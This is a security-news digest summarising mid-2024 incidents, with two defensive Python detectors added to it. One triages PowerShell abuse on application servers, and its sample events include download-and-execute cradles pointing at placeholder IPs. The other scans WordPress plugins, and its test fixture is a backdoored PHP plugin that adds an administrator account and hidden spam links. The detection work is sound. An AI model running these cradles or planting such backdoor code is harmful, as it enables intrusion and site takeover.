Baddies hijack Korean ERP vendor’s update systems to spew malware

July 2, 2024 at 01:41AM A South Korean ERP vendor’s product update server was breached and used to push malware to customers in place of legitimate updates. The attack, tentatively linked to the North Korea-associated Andariel group, targeted ERP systems with backdoors named HotCroissant and Riffdoor. The incident, detected by AhnLab, highlights the threat posed by such … Read more

Juniper Rushes Out Emergency Patch for Critical Smart Router Flaw

July 1, 2024 at 02:34PM Juniper Networks has released an emergency patch for a critical authentication bypass vulnerability, tracked as CVE-2024-2973, affecting Session Smart Router, Conductor, and WAN Assurance Router. The flaw, found internally, carries the maximum CVSS score of 10.0. Administrators should update affected devices immediately to prevent exploitation. Automatic updates will not disrupt … Read more

8220 Gang Exploits Oracle WebLogic Server Flaws for Cryptocurrency Mining

June 28, 2024 at 08:10AM Security researchers have published details of the 8220 Gang’s cryptocurrency mining operation, which exploits known vulnerabilities in Oracle WebLogic Server. The threat actor relies on fileless execution and multi-stage loading, including a PowerShell script that drops the miner payload. The researchers also describe a new installer tool called k4spreader, used … Read more
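The loading chain described above is visible in a WebLogic host’s process-creation telemetry: a PowerShell child of the Java process that runs the application server, usually with an encoded or hidden-window command line carrying a download cradle. The Python triage below is an added example, not code from the researchers’ report; the event records are constructed, and the parent-process list, field names and detection rules are this example’s assumptions.

```python
from __future__ import annotations

import base64
import re


def encode_ps(script: str) -> str:
    """Encode a script the way PowerShell's -EncodedCommand expects: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Processes that host web applications on Windows; a PowerShell child of any of
# them is unusual. WebLogic runs inside java.exe. The list is an assumption.
APP_SERVER_PARENTS = {"java.exe", "w3wp.exe", "httpd.exe", "tomcat9.exe"}

POWERSHELL = re.compile(r"\b(?:powershell|pwsh)(?:\.exe)?\b", re.I)
ENCODED_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
HIDDEN_WINDOW = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
DOWNLOAD_CRADLE = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Invoke-Expression|\biex\b|\bcurl\b|\bwget\b",
    re.I,
)


def decode_encoded_command(cmdline: str) -> str | None:
    """Recover the script hidden behind -EncodedCommand, or None if there is none."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(event: dict) -> list[str]:
    """Return the reasons an event is suspicious, in a fixed order; empty if none."""
    cmdline = event["cmdline"]
    if not POWERSHELL.search(cmdline):
        return []
    reasons: list[str] = []
    if event["parent"].lower() in APP_SERVER_PARENTS:
        reasons.append("spawned_by_app_server")
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        reasons.append("encoded_command")
    # Inspect the decoded script when there is one, otherwise the raw command line.
    if DOWNLOAD_CRADLE.search(decoded if decoded is not None else cmdline):
        reasons.append("download_cradle")
    if HIDDEN_WINDOW.search(cmdline):
        reasons.append("hidden_window")
    return reasons


def triage(events: list[dict]) -> dict[int, list[str]]:
    """Map pid -> reasons for every event that raised at least one reason."""
    flagged: dict[int, list[str]] = {}
    for event in events:
        reasons = analyze(event)
        if reasons:
            flagged[event["pid"]] = reasons
    return flagged


# Constructed process-creation events (Sysmon/EDR style); not real telemetry.
SAMPLE_EVENTS = [
    {   # PowerShell spawned by the Java process that hosts the application server
        "pid": 4120, "parent": "java.exe",
        "cmdline": "powershell.exe -NoP -W Hidden -EncodedCommand "
        + encode_ps("IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/x.ps1')"),
    },
    {   # Administrator launching a maintenance script from the desktop
        "pid": 5011, "parent": "explorer.exe",
        "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1",
    },
    {   # The application server itself, not PowerShell
        "pid": 612, "parent": "services.exe",
        "cmdline": r"C:\java\bin\java.exe -jar C:\wls\weblogic.jar",
    },
    {   # Plain-text download cradle from an interactive shell
        "pid": 7303, "parent": "cmd.exe",
        "cmdline": 'powershell -nop -c "IEX (iwr http://203.0.113.9/m.ps1 -UseBasicParsing)"',
    },
]

if __name__ == "__main__":
    for pid, reasons in triage(SAMPLE_EVENTS).items():
        print(pid, ", ".join(reasons))
```

The parent-process check is the strongest of the four signals: encoded commands and download cradles also appear in legitimate administration, but an application server has no business spawning PowerShell at all, so that one condition is worth an alert on its own.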

Dark Reading Confidential: Meet the Ransomware Negotiators

June 27, 2024 at 01:57PM Becky Bracken, Senior Editor at Dark Reading, hosts a podcast episode in which guests Ed Dubrovsky and Joe Tarraf discuss the complexities of ransomware negotiation. The episode stresses the value of professional expertise and emotional control when dealing with extortionists, and the guests argue for international cooperation and a proactive approach to … Read more

‘ChamelGang’ APT Disguises Espionage Activities With Ransomware

June 26, 2024 at 06:10AM ChamelGang, a China-backed APT group, has for three years used ransomware to mask its cyberespionage operations. Its recent targets include critical infrastructure in East Asia and India; the ransomware gives the group deniability and covers its tracks while it exfiltrates data. ChamelGang’s focus on data theft and cyberespionage is attributed to geopolitical … Read more

Threat Actor May Have Accessed Sensitive Info on CISA Chemical App

June 25, 2024 at 04:05PM A threat actor may have accessed sensitive data on US chemical facilities by compromising CISA’s Chemical Security Assessment Tool (CSAT). The information at risk includes chemical inventories, security assessments, and personnel details. The breach poses potential safety risks, and affected organizations are advised to review and strengthen their cybersecurity … Read more

Plugins on WordPress.org backdoored in supply chain attack

June 25, 2024 at 03:32PM A threat actor modified plugins hosted on WordPress.org to insert malicious code that creates new administrator accounts and injects SEO spam. Wordfence discovered the compromise and notified the developers, and most of the affected plugins have since been patched. The compromised plugins include Social Warfare, Blaze Widget, Wrapper Link Element, Contact Form 7 Multi-Step Addon, and … Read more
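The backdoor pattern described above leaves two greppable traces in a plugin’s PHP source: a call that creates a user and hands it the administrator role, and hidden markup carrying spam links. The scanner below is an added example, not Wordfence’s or WordPress.org’s own tooling; it walks a plugin directory for those indicators. The two plugin files it scans are constructed samples, and the function names and regular expressions are this example’s choices.

```python
from __future__ import annotations

import re
import tempfile
from pathlib import Path

# Indicators drawn from the plugin-backdoor pattern: user creation plus a
# hard-coded administrator role, common obfuscation wrappers, and hidden
# markup carrying links (SEO spam). The patterns are this example's choice.
ACCOUNT_CREATION = re.compile(r"\b(?:wp_insert_user|wp_create_user|add_role|set_role)\s*\(")
ADMIN_ROLE = re.compile(r"['\"]administrator['\"]")
OBFUSCATION = re.compile(r"\b(?:base64_decode|eval|gzinflate|str_rot13)\s*\(")
SEO_SPAM = re.compile(r"(?:display\s*:\s*none|visibility\s*:\s*hidden).*?<a\s", re.I | re.S)


def scan_file(path: Path) -> dict[str, bool]:
    """Return the indicators found in one PHP file (empty dict if clean)."""
    src = path.read_text(errors="replace")
    findings: dict[str, bool] = {}
    if ACCOUNT_CREATION.search(src) and ADMIN_ROLE.search(src):
        findings["admin_account_creation"] = True
    if OBFUSCATION.search(src):
        findings["obfuscation"] = True
    if SEO_SPAM.search(src):
        findings["seo_spam"] = True
    return findings


def scan_plugins(plugin_root: Path) -> dict[str, dict[str, bool]]:
    """Scan every .php file under a plugins directory and report the files with hits."""
    report: dict[str, dict[str, bool]] = {}
    for php in sorted(plugin_root.rglob("*.php")):
        findings = scan_file(php)
        if findings:
            report[php.relative_to(plugin_root).as_posix()] = findings
    return report


# Constructed sample plugins for demonstration; not real plugin code.
BENIGN_PLUGIN = """<?php
/* Plugin Name: Hello Widget (constructed sample) */
add_action('widgets_init', function () {
    register_widget('Hello_Widget');
});
"""

BACKDOORED_PLUGIN = """<?php
/* Plugin Name: Social Share Helper (constructed sample) */
add_action('init', function () {
    if (!username_exists('wpsupport')) {
        $uid = wp_create_user('wpsupport', 'P@ssw0rd!', 'support@example.invalid');
        $user = new WP_User($uid);
        $user->set_role('administrator');
    }
});
add_filter('the_content', function ($content) {
    return $content . '<div style="display:none"><a href="https://spam.example/">cheap pills</a></div>';
});
"""


def demo() -> dict[str, dict[str, bool]]:
    """Write the two constructed plugins into a temp dir and scan them."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "hello-widget").mkdir()
        (root / "hello-widget" / "hello-widget.php").write_text(BENIGN_PLUGIN)
        (root / "social-share-helper").mkdir()
        (root / "social-share-helper" / "social-share-helper.php").write_text(BACKDOORED_PLUGIN)
        return scan_plugins(root)


if __name__ == "__main__":
    for path, findings in demo().items():
        print(path, sorted(findings))
```

Point `scan_plugins` at a live site’s `wp-content/plugins` directory to triage it; a hit on `admin_account_creation` is rare in legitimate plugins and should be read alongside the site’s actual user list, since the code on the page only matters if it has already run.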

Neiman Marcus confirms data breach after Snowflake account hack

June 25, 2024 at 10:55AM Luxury retailer Neiman Marcus has confirmed a data breach after hackers tried to sell a database stolen in the recent wave of Snowflake data theft attacks. The breach affected 64,472 people, exposing names, contact details, and gift card numbers. It is likely linked to the threat actor “Sp1d3r” and … Read more

Chemical facilities warned of possible data theft in CISA CSAT breach

June 24, 2024 at 04:58PM CISA’s Chemical Security Assessment Tool (CSAT) was breached in January when attackers deployed a web shell on its Ivanti device, potentially exposing sensitive security assessments and plans. CISA confirmed the breach and, while it found no evidence of data theft, is notifying potentially affected individuals and organizations out … Read more

RedJuliett Cyber Espionage Campaign Hits 75 Taiwanese Organizations

June 24, 2024 at 04:24AM Between November 2023 and April 2024, a China-linked state-sponsored threat actor tracked as RedJuliett ran a cyber espionage campaign against government, academic, and diplomatic organizations in Taiwan. Among other techniques, the actor deployed web shells and exploited vulnerabilities, focusing on intelligence related to Taiwan’s economic policy and diplomatic … Read more